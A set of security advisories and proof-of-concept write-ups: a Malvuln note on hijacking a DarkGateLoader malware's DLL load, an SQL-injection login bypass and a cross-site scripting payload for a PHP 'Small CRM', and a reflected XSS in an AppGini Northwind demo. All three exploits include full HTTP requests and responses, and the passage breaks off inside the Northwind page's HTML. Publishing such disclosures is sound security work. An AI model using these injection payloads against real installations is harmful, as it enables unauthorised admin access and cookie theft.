<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/afe012ed0d96abfe869b9e26ea375824.txt<br />Contact: malvuln13@gmail.com<br />Media: x.com/malvuln <br /><br />Threat: Trojan.Win32.DarkGateLoader (multi variants)<br />Vulnerability: Arbitrary Code Execution<br />Description: Multiple variants of this malware look for and execute x32-bit "urlmon.dll" PE file in its current directory. Therefore, we can hijack that DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3.1 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.<br /><br />Family: DarkGateLoader<br />Type: PE32<br />MD5: afe012ed0d96abfe869b9e26ea375824<br />SHA256: 18d87c514ff25f817eac613c5f2ad39b21b6e04b6da6dbe8291f04549da2c290<br /><br />Other vulnerable samples: <br />cad102af0d2709fd57f62d9cce9ba174<br />ca2ef9d3146341428657295892894170<br />3c609ac6b2de29578a2383d71e12caa9<br /><br />Vuln ID: MVID-2024-0685<br />Disclosure: 06/05/2024<br /><br />Exploit/PoC:<br />1) Download RansomLord v3.1<br /> https://github.com/malvuln/RansomLord<br />2) Locate the x32 urlmon.dll entry using the -m flag (DLL Map)<br />3) Use -g flag (Generate Exploit) to output an x32 DLL urlmon.dll, based on an existing vulnerable malware in the victims list.<br />4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will attempt to log the SHA256 hash, full path and filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Small CRM Developed using PHP and MySQL - SQLi Authentication Bypass<br /># Date: 05.06.2024<br /># Exploit Author: Furkan Eren Tetik<br /># Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads<br /># Software Link: https://phpgurukul.com/small-crm-php<br /># Version: 1.0<br /># Tested on: Windows 11, Kali Linux<br /># Small CRM Developed System Login page can be bypassed with a simple SQLi to the username parameter.<br /># https://www.linkedin.com/in/furkanerentetik/<br /><br /><br />Steps To Reproduce:<br />1 - Go to the login page http://localhost/crm/crm/admin/<br />2 - In the username field, enter the data value as "fet'--" without double quotes, and in the password field, enter a # sign.<br />3 - Click on "Login" button and you are logged in as administrator. <br /><br />PoC<br /><br />Request<br /><br />POST /crm/crm/admin/ HTTP/1.1<br />Host: localhost<br />Content-Length: 34<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/crm/crm/admin/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=9ti9hb3hc6484bubl69jlaa9t5<br />Connection: close<br /><br />email=fet%27--&password=%23&login=<br /><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 04 Jun 2024 21:58:52 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12<br />X-Powered-By: PHP/8.2.12<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 48<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><script>window.location.href='home.php'</script><br /></code></pre>
<pre><code># Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting (Reflected)<br /># Date: 05.06.2024<br /># Exploit Author: Furkan Eren Tetik<br /># Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads<br /># Software Link: https://phpgurukul.com/small-crm-php<br /># Version: 1.0<br /># Tested on: Windows 11, Kali Linux<br /># Small CRM Developed System can be attacked with xss with a simple script<br /># https://www.linkedin.com/in/furkanerentetik/<br /><br /><br />Steps To Reproduce:<br />1 - Go to the login page http://localhost/crm/crm/profile.php<br />2 - Add new record payload= 'name='><script>alert(document.cookie)</script>'<br />3 - Enter on alert warning appears.<br /><br /><br />PoC<br /><br />Request<br /><br />POST /crm/crm/profile.php HTTP/1.1<br />Host: localhost<br />Content-Length: 674<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/crm/crm/profile.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=1<br />Connection: close<br /><br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />Content-Disposition: form-data; name="name"<br /><br />"><script>alert(document.cookie)</script><br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />Content-Disposition: form-data; name="alt_email"<br /><br /><br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />Content-Disposition: form-data; name="phone"<br /><br />0000000000<br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />Content-Disposition: form-data; name="gender"<br /><br />m<br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />Content-Disposition: form-data; name="address"<br /><br />deneme<br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW<br />Content-Disposition: form-data; name="update"<br /><br />Update<br />------WebKitFormBoundaryYFQBlbKN8Nl8KtgW--<br /><br /><br />----------------------------------------------------------------------------------------------<br /><br />Response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 04 Jun 2024 22:22:26 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12<br />X-Powered-By: PHP/8.2.12<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 13521<br /><br /><script>alert('Your profile updated successfully.');</script><br /><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><br /><meta charset="utf-8" /><br /><title>CRM | User Profile</title><br /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /><br /><meta content="" name="description" /><br /><meta content="" name="author" /><br /><br /><link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/><br /><link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/><br /><link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/><br /><link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/><br /><link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/><br /><link href="assets/plugins/jquery-scrollbar/jquery.scrollbar.css" rel="stylesheet" type="text/css"/><br /><link href="assets/css/style.css" rel="stylesheet" type="text/css"/><br /><link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/><br /><link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/><br /></head><br /><body class=""><br /><div class="header navbar navbar-inverse "><br /> <div class="navbar-inner"><br /> <div class="header-seperation"><br /> <ul class="nav pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none"><br /> <li class="dropdown"> <a id="main-menu-toggle" href="#main-menu" class="" ><br /> <div class="iconset top-menu-toggle-white"></div><br /> </a> </li><br /> </ul><br /> <a href="dashboard.php" style="color:#FFF; font-size:24px; margin-top:20%;">CRM</a><br /> <ul class="nav pull-right notifcation-center"><br /> <li class="dropdown" id="header_task_bar"> <a href="dashboard.php" class="dropdown-toggle active" data-toggle=""><br /> <div class="iconset top-home"></div><br /> </a> </li><br /> <br /> </ul><br /> </div><br /> <div class="header-quick-nav" ><br /> <div class="pull-left"><br /> <br /> <br /> </div><br /> <div class="pull-right"><br /> <ul class="nav quick-section "><br /> <li class="quicklinks"> <a data-toggle="dropdown" class="dropdown-toggle pull-right " href="#" id="user-options"><br /> <div class="iconset top-settings-dark "></div><br /> </a><br /> <ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options"><br /> <li><a href="profile.php"> My Account</a> </li><br /> <li class="divider"></li><br /> <li><a href="logout.php"><i class="fa fa-power-off"></i>&nbsp;&nbsp;Log Out</a></li><br /> </ul><br /> </li><br /><br /> </ul><br /> </div><br /> <!-- END CHAT TOGGLER --><br /> </div><br /> <!-- END TOP NAVIGATION MENU --><br /> </div><br /> <!-- END TOP NAVIGATION BAR --><br /></div><br /><!-- END HEADER --><div class="page-container row-fluid"><br /> <!-- BEGIN SIDEBAR --><br /> <div class="page-sidebar" id="main-menu"><br /> <!-- BEGIN MINI-PROFILE --><br /> <div class="page-sidebar-wrapper scrollbar-dynamic" id="main-menu-wrapper"><br /> <div class="user-info-wrapper"><br /> <div class="profile-wrapper"> <img src="assets/img/user.png" alt="" data-src="assets/img/user.png" data-src-retina="assets/img/user.png" width="69" height="69" /> </div><br /> <div class="user-info"><br /> <div class="greeting" style="font-size:14px;">Welcome</div><br /> <div class="username" style="font-size:12px;">fet</div><br /> <div class="status" style="font-size:10px;"><a href="#"><br /> <div class="status-icon green"></div><br /> Online</a></div><br /> </div><br /> </div><br /> <!-- END MINI-PROFILE --><br /> <!-- BEGIN SIDEBAR MENU --><br /> <p class="menu-title">BROWSE <span class="pull-right"><a href="javascript:;"><i class="fa fa-refresh"></i></a></span></p><br /> <br /> <ul> <br /> <li class="start"> <a href="dashboard.php"> <i class="icon-custom-home"></i> <span class="title">Dashboard</span> <span class="selected"></span> </a> <br /> </li><br /> <br /> <li><a href="change-password.php"><span class="fa fa-file-text-o"></span> Change Password</a></li><br /> <li><a href="profile.php"><span class="fa fa-user"></span> Profile</a></li><br /> <br /> <br /> <li ><a href="get-quote.php"> <span class="fa fa-tasks"></span> Request a Quote</a></li><br /> <li ><a href="create-ticket.php"><span class="fa fa-ticket"></span> Create Ticket</a></li><br /> <li ><a href="view-tickets.php"><span class="fa fa-ticket"></span> View Ticket</a></li><br /> <br /> </ul><br /> <br /> <div class="clearfix"></div><br /> </div><br /> </div><br /> <a href="#" class="scrollup">Scroll</a><br /> <div class="footer-widget"> <br /> <div class="progress transparent progress-small no-radius no-margin"><br /> <div data-percentage="79%" class="progress-bar progress-bar-success animate-progress-bar" ></div> <br /> </div><br /> <div class="pull-right"><br /> </div><br /> </div><br /> <div class="page-content"> <br /> <div id="portlet-config" class="modal hide"><br /> <div class="modal-header"><br /> <button data-dismiss="modal" class="close" type="button"></button><br /> <h3>Widget Settings</h3><br /> </div><br /> <div class="modal-body"> Widget settings form goes here </div><br /> </div><br /> <div class="clearfix"></div><br /> <div class="content"> <br /> <div class="page-title"> <br /> <h3>fet's Profile</h3><br /> <br /> <div class="row"><br /> <div class="col-md-12"><br /> <br /> <form class="form-horizontal" method="post" enctype="multipart/form-data"><br /> <div class="panel panel-default"><br /> <div class="panel-heading"><br /> <h3 class="panel-title"><strong>Your Profile</h3><br /> <div align="right"><br /> Registration Date :2024-06-05 01:16:29 <br /> </div><br /> </div><br /> <br /> <div class="panel-body"> <br /> <br /> <div class="form-group"><br /> <label class="col-md-3 col-xs-12 control-label">Name</label><br /> <div class="col-md-6 col-xs-12"> <br /> <div class="input-group"><br /> <span class="input-group-addon"><span class="fa fa-pencil"></span></span><br /> <input type="text" name="name" value=""><script>alert(1)</script>" class="form-control"/><br /> </div> <br /> <br /> </div><br /> </div><br /> <div class="form-group"><br /> <label class="col-md-3 col-xs-12 control-label">Primary Email </label><br /> <div class="col-md-6 col-xs-12"> <br /> <div class="input-group"><br /> <span class="input-group-addon"><span class="fa fa-pencil"></span></span><br /> <input type="text" name="email" value="fet@gmail.com" disabled="disabled" class="form-control"/><br /> </div> <br /> <br /> </div><br /> </div><br /> <div class="form-group"><br /> <label class="col-md-3 col-xs-12 control-label">alternate Email </label><br /> <div class="col-md-6 col-xs-12"> <br /> <div class="input-group"><br /> <span class="input-group-addon"><span class="fa fa-pencil"></span></span><br /> <input type="text" name="alt_email" value="" class="form-control"/><br /> </div> <br /> <br /> </div><br /> </div><br /> <div class="form-group"><br /> <label class="col-md-3 col-xs-12 control-label">Contact no </label><br /> <div class="col-md-6 col-xs-12"> <br /> <div class="input-group"><br /> <span class="input-group-addon"><span class="fa fa-pencil"></span></span><br /> <input type="text" name="phone" value="0000000000" maxlength="10" class="form-control"/><br /> </div> <br /><br /> <br /> </div><br /> </div><br /> <br /> <br /> <div class="form-group"><br /> <label class="col-md-3 col-xs-12 control-label">Gender </label><br /> <div class="col-md-6 col-xs-12"> <br /> <div class="input-group"><br /> <span class="input-group-addon"><span class="fa fa-pencil"></span></span><br /> <select class="form-control select" name="gender"><br /> <option value="m">Male</option><br /> <option value="m">Male</option><br /> <option value="f">Female</option><br /> <option value="others">Other</option><br /> </select><br /> </select><br /> </div> <br /> <br /> </div><br /> </div><br /> <br /> <br /> <br /> <br /> <div class="form-group"><br /> <label class="col-md-3 col-xs-12 control-label">Address</label><br /> <div class="col-md-6 col-xs-12"> <br /> <textarea class="form-control" name="address" rows="5">"><script>alert(1)</script></textarea><br /> <br /> </div><br /> </div><br /> <br /> <br /> <br /> <br /> <br /> <br /><br /> </div><br /> <div class="panel-footer"><br /> <button class="btn btn-default" type="reset">Clear Form</button> <br /> <input type="submit" value="Update" name="update" class="btn btn-primary pull-right"><br /> </div><br /> </div><br /> </form><br /> <br /> </div><br /> </div> <br /> <br /> <br /> </div><br /> </div><br /> </div><br /><br /> </div><br /><script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script> <br /><script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script> <br /><script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script> <br /><script src="assets/plugins/breakpoints.js" type="text/javascript"></script> <br /><script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script> <br /><script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script> <br /><script src="assets/plugins/jquery-scrollbar/jquery.scrollbar.min.js" type="text/javascript"></script><br /><script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script> <br /><script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script><br /><script src="assets/js/core.js" type="text/javascript"></script> <br /><script src="assets/js/chat.js" type="text/javascript"></script> <br /><script src="assets/js/demo.js" type="text/javascript"></script> <br /><br /></body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Northwind, company operations database - Cross-Site Scripting (Reflected)<br /># Date: 04.06.2024<br /># Exploit Author: Furkan Eren Tetik<br /># Vendor Homepage: https://bigprof.com/appgini/free-open-source-web-applications<br /># Software Link: https://github.com/bigprof-software/northwind-demo<br /># Version: 1.0<br /># Tested on: Windows 11, Kali Linux<br /># Northwind, company operations database page can be attacked with xss with a simple script<br /># https://www.linkedin.com/in/furkanerentetik/<br /><br /><br />Steps To Reproduce:<br />1 - Go to the login page http:///fetuygulama/app/customers_view.php<br />2 - Add new record payload=browser_window_id=.......%22%3e%3cscript%3ealert(1)%3c%2fscript%3e........<br />3 - Enter on url alert warning appears.<br /><br />PoC<br /><br />Request<br /><br />GET /fetuygulama/app/customers_view.php?record-added-ok=76371387&SortField=&SortDirection=&FirstRecord=1&DisplayRecords=all&SearchString=&SelectedID=3&browser_window_id=0d76e64e70f5%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E0d76e64e70f5 HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: Northwind=52149sofrm6k5359nuun3h1514; displayDemoTools=on; demoInfoShownBefore=yes; compactMode=true<br />Connection: close<br /><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 04 Jun 2024 14:34:48 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12<br />X-Powered-By: PHP/8.2.12<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 112205<br /><br /><!DOCTYPE html><br /><html class="no-js"><br /> <head><br /> <meta charset="UTF-8"><br /> <meta name="description" content=""><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /><br /> <title>Northwind | Customers</title><br /> <link id="browser_favicon" rel="shortcut icon" href="resources/images/appgini-icon.png"><br /><br /> <link rel="stylesheet" href="resources/initializr/css/bootstrap.css"><br /> <link rel="stylesheet" href="resources/lightbox/css/lightbox.css" media="screen"><br /> <link rel="stylesheet" href="resources/select2/select2.css" media="screen"><br /> <link rel="stylesheet" href="resources/timepicker/bootstrap-timepicker.min.css" media="screen"><br /> <link rel="stylesheet" href="resources/datepicker/css/datepicker.css" media="screen"><br /> <link rel="stylesheet" href="resources/bootstrap-datetimepicker/bootstrap-datetimepicker.css" media="screen"><br /> <link rel="stylesheet" href="dynamic.css?1716373920"><br /><br /> <script src="resources/jquery/js/jquery-3.5.1.min.js"></script><br /> <script>var $j = jQuery.noConflict();</script><br /> <script src="resources/moment/moment-with-locales.min.js"></script><br /> <script src="resources/jquery/js/jquery.mark.min.js"></script><br /> <script src="resources/initializr/js/vendor/bootstrap.min.js"></script><br /> <script src="resources/lightbox/js/prototype.js"></script><br /> <script src="resources/lightbox/js/scriptaculous.js?load=effects"></script><br /> <script src="resources/select2/select2.min.js"></script><br /> <script src="resources/timepicker/bootstrap-timepicker.min.js"></script><br /> <script src="resources/datepicker/js/datepicker.packed.js"></script><br /> <script src="resources/bootstrap-datetimepicker/bootstrap-datetimepicker.min.js"></script><br /> <script src="resources/hotkeys/jquery.hotkeys.min.js"></script><br /> <script src="nicEdit.js"></script><br /><br /> <script><br /> var AppGini = AppGini || {};<br /><br /> /* translation strings */<br /> AppGini.Translate = {<br /> _map: {<br /> "ImageFolder": ".\/images\/",<br /> "membership management": "Membership Management",<br /> "password mismatch": "Password doesn't match.",<br /> "error": "Error",<br /> "invalid email": "Invalid Email Address",<br /> "sending mails": "Sending mails might take some time. Please don't close this page until you see the 'Done' message.",<br /> "complete step 4": "Please complete step 4 by selecting the member you want to transfer records to.",<br /> "info": "Info",<br /> "sure move member": "Are you sure you want to move member '<MEMBER>' and his data from group '<OLDGROUP>' to group '<NEWGROUP>'?",<br /> "sure move data of member": "Are you sure you want to move data of member '<OLDMEMBER>' from group '<OLDGROUP>' to member '<NEWMEMBER>' from group '<NEWGROUP>'?",<br /> "sure move all members": "Are you sure you want to move all members and data from group '<OLDGROUP>' to group '<NEWGROUP>'?",<br /> "sure move data of all members": "Are you sure you want to move data of all members of group '<OLDGROUP>' to member '<MEMBER>' from group '<NEWGROUP>'?",<br /> "toggle navigation": "Toggle navigation",<br /> "admin area": "Admin Area",<br /> "groups": "Groups",<br /> "view groups": "View Groups",<br /> "add group": "Add Group",<br /> "edit anonymous permissions": "Edit Anonymous Permissions",<br /> "members": "Members",<br /> "view members": "View Members",<br /> "add member": "Add Member",<br /> "view members' records": "View Members' Records",<br /> "utilities": "Utilities",<br /> "admin settings": "Admin Settings",<br /> "rebuild thumbnails": "Rebuild thumbnails",<br /> "rebuild fields": "You could try fixing this issue from the Admin Area : Utilities menu : View\/Rebuild Fields.",<br /> "import CSV": "Import CSV data",<br /> "batch transfer": "Batch Transfer Wizard",<br /> "mail all users": "Mail All Users",<br /> "AppGini forum": "AppGini Community Forum",<br /> "user's area": "User's area",<br /> "sign out": "Sign Out",<br /> "attention": "Attention!",<br /> "security risk admin": "You are using the default admin username and password. This is a huge security risk. Please change at least the admin password from the <a href=\"pageSettings.php\">Admin Settings<\/a> page <em>immediately<\/em>.",<br /> "security risk": "You are using the default admin password. This is a huge security risk. Please change the admin password from the <a href=\"pageSettings.php\">Admin Settings<\/a> page <em>immediately<\/em>.",<br /> "plugins": "Plugins",<br /> "assigned table records to group": "Assigned <NUMBER> records of table '<TABLE>' to group '<GROUP>'",<br /> "assigned table records to group and member": "Assigned <NUMBER> records of table '<TABLE>' to group '<GROUP>' , member '<MEMBERID>'",<br /> "data ownership assign": "Assign ownership to data that has no owners",<br /> "records ownership done": "All records in all tables have owners now.<br>Back to <a href='pageHome.php'>Admin homepage<\/a>.",<br /> "select group": "Select group",<br /> "data ownership": "Sometimes, you might have tables with data that were entered before implementing this AppGini membership management system, or entered using other applications unaware of AppGini ownership system. This data currently has no owners. This page allows you to assign owner groups and owner members to this data.",<br /> "table": "Table",<br /> "records with no owners": "Records with no owners",<br /> "new owner group": "New owner group",<br /> "new owner member": "New owner member*",<br /> "cancel": "Cancel",<br /> "assign new owners": "Assign new owners",<br /> "please wait": "Please wait",<br /> "if no owner member assigned": "* If you assign no owner member here, you can still use the <a href=\"pageTransferOwnership.php\">Batch Transfer Wizard<\/a> later to do so.",<br /> "can not delete group remove members": "Can't delete this group. Please remove members first.",<br /> "can not delete group transfer records": "Can't delete this group. Please transfer its data records to another group first..",<br /> "group exists error": "Error: Group name already exists. You must choose a unique group name.",<br /> "group not found error": "Error: Group not found!",<br /> "edit group": "Edit Group '<GROUPNAME>'",<br /> "add new group": "Add New Group",<br /> "anonymous group attention": "Attention! This is the anonymous group.",<br /> "show tool tips": "Show tool tips as mouse moves over options",<br /> "group name": "Group name",<br /> "readonly group name": "The name of the anonymous group is read-only here.",<br /> "anonymous group name": "If you name the group '<ANONYMOUSGROUP>', it will be considered the anonymous group<br>that defines the permissions of guest visitors that do not log into the system.",<br /> "description": "Description",<br /> "allow visitors sign up": "Allow visitors to sign up?",<br /> "admin add users": "No. Only the admin can add users.",<br /> "admin approve users": "Yes, and the admin must approve them.",<br /> "automatically approve users": "Yes, and automatically approve them.",<br /> "group table permissions": "Table permissions for this group",<br /> "no": "No",<br /> "owner": "Owner",<br /> "group": "Group",<br /> "all": "All",<br /> "insert": "Insert",<br /> "view": "View",<br /> "edit": "Edit",<br /> "delete": "Delete",<br /> "save changes": "Save changes",<br /> "username error": "Error: Username already exists or is invalid. Make sure you provide a username containing 4 to 20 valid characters.",<br /> "member not found": "Error: Member not found!",<br /> "user has special permissions": "This user has special permissions that override his group permissions.",<br /> "user has group permissions": "This user inherits the <a href=\"pageEditGroup.php?groupID=<GROUPID>\">permissions of his group<\/a>.",<br /> "set user special permissions": "Set special permissions for this user",<br /> "sure continue": "If you made any changes to this member and did not save them yet, they will be lost if you continue. Are you sure you want to continue?",<br /> "edit member": "Edit Member <MEMBERID>",<br /> "add new member": "Add New Member",<br /> "anonymous guest member": "Attention! This is the anonymous (guest) member.",<br /> "admin member": "Attention! This is the admin member. You can't change the username, password or email of this member here, but you can do so in the <a href=\"pageSettings.php\">admin settings<\/a> page.",<br /> "member username": "Member username",<br /> "check availability": "Check if this username is available",<br /> "read only username": "The username of the guest member is read-only.",<br /> "password": "Password",<br /> "change password": "Type a password only if you want to change this member's<br>password. Otherwise, leave this field empty.",<br /> "confirm password": "Confirm Password",<br /> "email": "Email Address",<br /> "approved": "Approved?",<br /> "banned": "Banned?",<br /> "comments": "Comments",<br /> "back to members": "Back to members",<br /> "member added": "Member <USERNAME> added successfully",<br /> "member permissions saved": "Member permissions have been saved successfully.",<br /> "member permissions reset": "Member permissions have been reset to the same as his group.",<br /> "user table permissions": "Table permissions for user <a href='pageEditMember.php?memberID=<MEMBER>' title='View member details'><MEMBERID><\/a> of group <a href='pageEditGroup.php?groupID=<GROUPID>' title='View group details and permissions'><GROUP><\/a>",<br /> "no member permissions": "This member doesn't currently have any special permissions. This list shows the permissions of his group.",<br /> "reset member permissions": "Reset member permissions",<br /> "remove special permissions": "This would remove all special permissions of this user and he will have the same permissions as his group. Are you sure you want to do that?",<br /> "invalid table": "Invalid table.",<br /> "invalid primary key": "Invalid primary key value",<br /> "record not found": "Record not found ... if it was imported externally, try assigning an owner from the admin area.",<br /> "invalid username": "Invalid username",<br /> "record not found error": "Error: Record not found!",<br /> "edit Record Ownership": "Edit Record Ownership",<br /> "owner group": "Owner group",<br /> "view all records by group": "View all records by this group",<br /> "owner member": "Owner member",<br /> "view all records by member": "View all records by this member",<br /> "switch record ownership": "If you want to switch ownership of this record to a member of another group, you must change the owner group and save changes first.",<br /> "record created on": "Record created on",<br /> "record modified on": "Record modified on",<br /> "view all records of table": "View all records of this table",<br /> "record data": "Record data",<br /> "print": "Print",<br /> "could not retrieve field list": "Couldn't retrieve field list from '<TABLENAME>'",<br /> "field name": "Field name",<br /> "value": "Value",<br /> "visitor sign up": "<a href=\"..\/membership_signup.php\" target=\"_blank\">Visitor sign up<\/a> is disabled because there are no groups where visitors can sign up currently. To enable visitor sign-up, set at least one group to allow visitor sign-up.",<br /> "table data without owner": "You have data in one or more tables that doesn't have an owner. To assign an owner group for this data, <a href=\"pageAssignOwners.php\">click here<\/a>.",<br /> "membership management homepage": "Membership Management Homepage",<br /> "newest updates": "Newest Updates",<br /> "view record details": "View record details",<br /> "newest entries": "Newest Entries",<br /> "available add-ons": "Available add-ons",<br /> "more info": "More info",<br /> "close": "Close",<br /> "view add-ons": "View all add-ons",<br /> "top members": "Top Members",<br /> "edit member details": "Edit member details",<br /> "view member records": "View member's data records",<br /> "records": "records",<br /> "members stats": "Members Stats",<br /> "total groups": "Total groups",<br /> "active members": "Active members",<br /> "view active members": "View active members",<br /> "members awaiting approval": "Members awaiting approval",<br /> "view members awaiting approval": "View members awaiting approval",<br /> "banned members": "Banned members",<br /> "view banned members": "View banned members",<br /> "total members": "Total members",<br /> "view all members": "View all members",<br /> "BigProf tweets": "Tweets By BigProf Software",<br /> "follow BigProf": "Follow @bigprof",<br /> "loading bigprof feed": "Loading @bigprof feed ...",<br /> "remove feed": "Remove this feed",<br /> "can not send mail": "You can not send emails currently. The configured sender email address is not valid. Please <a href='pageSettings.php'>correct it first<\/a> then try again.",<br /> "all groups": "All groups",<br /> "no recipient": "Couldn't find recipient. Please make sure you provide a valid recipient.",<br /> "invalid subject line": "Invalid subject line.",<br /> "no recipient found": "Couldn't find any recipients. Please make sure you provide a valid recipient.",<br /> "mail queue not saved": "Couldn't save mail queue. Please make sure the directory '<CURRDIR>' is writeable (chmod 755 or chmod 777).",<br /> "send mail": "Send mail message to a member\/group",<br /> "send mail to all members": "You are sending an email to all members. This could take a lot of time and affect your server performance. If you have a huge number of members, we don't recommend sending an email to all of them at once.",<br /> "from": "From",<br /> "change setting": "Change this setting",<br /> "to": "To",<br /> "subject": "Subject",<br /> "message": "Message",<br /> "send message": "Send Message",<br /> "record details": "Membership Management -- Record details",<br /> "table name": "Table: <TABLENAME>",<br /> "create or update table": "An attempt to <ACTION> the field <i><FIELD><\/i> in <i><TABLE><\/i> table was made by executing this query: <pre><QUERY><\/pre> Results are shown below.",<br /> "view or rebuild fields": "View\/Rebuild fields",<br /> "show deviations only": "Show deviations only",<br /> "show all fields": "Show all fields",<br /> "compare tables page": "This page compares the tables and fields structure\/schema as 